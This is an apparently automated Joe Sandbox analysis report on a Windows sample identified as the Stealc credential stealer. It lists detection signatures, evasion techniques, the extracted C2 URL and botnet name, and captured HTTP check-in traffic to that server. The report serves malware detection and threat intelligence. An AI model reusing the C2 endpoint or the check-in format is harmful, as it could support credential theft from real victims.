Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uCEeVGAWIB.exe

Overview

General Information

Sample name:uCEeVGAWIB.exe
renamed because original name is a hash value
Original sample name:9a4891bcf21b6639412f96c108a27744.exe
Analysis ID:1542883
MD5:9a4891bcf21b6639412f96c108a27744
SHA1:7a7052586f6b35e6b5594528a2b84ca62bb14218
SHA256:4dbfa3d8eef4144e8d2d90fa3f91d14aa7f09063aa0d9b5c7a17488f93ac861e
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • uCEeVGAWIB.exe (PID: 1120 cmdline: "C:\Users\user\Desktop\uCEeVGAWIB.exe" MD5: 9A4891BCF21B6639412F96C108A27744)
    • WerFault.exe (PID: 3004 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1120 -s 1052 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://94.141.122.159/baf27292fb61e144.php", "Botnet": "LogsDiller"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2241173522.000000000089A000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x1318:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2173056951.0000000000B80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            0.2.uCEeVGAWIB.exe.400000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.2.uCEeVGAWIB.exe.400000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.2.uCEeVGAWIB.exe.810e67.2.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.3.uCEeVGAWIB.exe.b80000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    0.3.uCEeVGAWIB.exe.b80000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                      Click to see the 1 entries
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-26T19:22:28.565437+020020442431Malware Command and Control Activity Detected192.168.2.64971094.141.122.15980TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 00000000.00000003.2173056951.0000000000B80000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://94.141.122.159/baf27292fb61e144.php", "Botnet": "LogsDiller"}
                      Source: uCEeVGAWIB.exeReversingLabs: Detection: 31%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: uCEeVGAWIB.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C820
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407240
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409AC0
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00418EA0
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00409B60
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_008174A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_008174A7
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00819DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00819DC7
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00829107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00829107
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00819D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00819D27
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0081CA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_0081CA87

                      Compliance

                      barindex
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeUnpacked PE file: 0.2.uCEeVGAWIB.exe.400000.1.unpack
                      Source: uCEeVGAWIB.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0081C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0081C0D7
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0081DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0081DCE7
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0081E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0081E077
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00824107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00824107
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0081F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0081F917
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00811937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00811937
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0081E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0081E697
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0081EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0081EF87
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_008247D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_008247D7
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00823B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00823B17
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00824B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00824B77

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49710 -> 94.141.122.159:80
                      Source: Malware configuration extractorURLs: http://94.141.122.159/baf27292fb61e144.php
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 94.141.122.159Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /baf27292fb61e144.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGIHost: 94.141.122.159Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 33 42 41 42 45 38 31 44 44 33 41 34 30 34 33 37 32 38 33 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 2d 2d 0d 0a Data Ascii: ------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="hwid"13BABE81DD3A4043728354------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="build"LogsDiller------KJDGDBFBGIDGIEBGHCGI--
                      Source: Joe Sandbox ViewASN Name: UNITLINE_RST_NET1RostovnaDonuRU UNITLINE_RST_NET1RostovnaDonuRU
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.122.159
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404880
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 94.141.122.159Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTP traffic detected: POST /baf27292fb61e144.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGIHost: 94.141.122.159Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 33 42 41 42 45 38 31 44 44 33 41 34 30 34 33 37 32 38 33 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 2d 2d 0d 0a Data Ascii: ------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="hwid"13BABE81DD3A4043728354------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="build"LogsDiller------KJDGDBFBGIDGIEBGHCGI--
                      Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, uCEeVGAWIB.exe, 00000000.00000002.2241108646.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.141.122.159
                      Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.141.122.159/
                      Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.141.122.159/U
                      Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.141.122.159/Y
                      Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.141.122.159/baf27292fb61e144.php
                      Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.141.122.159/baf27292fb61e144.php3F
                      Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.141.122.159/baf27292fb61e144.php?F
                      Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.141.122.159/baf27292fb61e144.phpG
                      Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.141.122.159/baf27292fb61e144.phpOG
                      Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.141.122.159/baf27292fb61e144.phpR
                      Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.141.122.159/baf27292fb61e144.phpS
                      Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.141.122.159/ws
                      Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net

                      System Summary

                      barindex
                      Source: 00000000.00000002.2241173522.000000000089A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: String function: 004045C0 appears 317 times
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1120 -s 1052
                      Source: uCEeVGAWIB.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000000.00000002.2241173522.000000000089A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: uCEeVGAWIB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@0/1
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413720
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\O8IY84DZ.htmJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1120
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\706d4a47-8d0e-4d9e-99cd-af4434e793abJump to behavior
                      Source: uCEeVGAWIB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: uCEeVGAWIB.exeReversingLabs: Detection: 31%
                      Source: unknownProcess created: C:\Users\user\Desktop\uCEeVGAWIB.exe "C:\Users\user\Desktop\uCEeVGAWIB.exe"
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1120 -s 1052
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeSection loaded: msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeUnpacked PE file: 0.2.uCEeVGAWIB.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeUnpacked PE file: 0.2.uCEeVGAWIB.exe.400000.1.unpack
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0041B035 push ecx; ret 0_2_0041B048
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0082B29C push ecx; ret 0_2_0082B2AF
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0089F925 push eax; ret 0_2_0089F943
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0089F934 push eax; ret 0_2_0089F943
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0089C954 push 7DD07DC0h; iretd 0_2_0089C965
                      Source: uCEeVGAWIB.exeStatic PE information: section name: .text entropy: 7.486368351428681
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
